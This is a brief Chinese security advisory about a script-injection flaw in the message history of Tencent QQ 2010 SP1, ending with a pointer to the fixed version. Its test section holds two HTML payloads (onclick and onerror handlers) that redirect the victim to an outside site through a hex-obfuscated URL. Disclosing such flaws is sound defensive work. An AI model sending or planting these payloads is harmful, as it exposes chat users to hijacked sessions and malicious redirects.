影响版本:
Tencent QQ 2010 SP1漏洞描述:
腾讯QQ是一款在中国非常广泛使用的即时聊天工具。
腾讯QQ 2010 SP1在处理消息记录时,没有对会话消息中的Javascript和Html标签进行正确转义,攻击者可以发送恶意消息注入脚本代码并执行。
<*参考
TGL
*>
测试方法:
<input onclick="window.location=' x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d'"/>
<img src='tetet' onerror="window.location='x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d'"/>SEBUG安全建议:
最新版本的腾讯QQ已经修复此漏洞,建议用户下载使用:
http://im.qq.com/qq/dlqq.shtml
会员登录关闭
注册会员关闭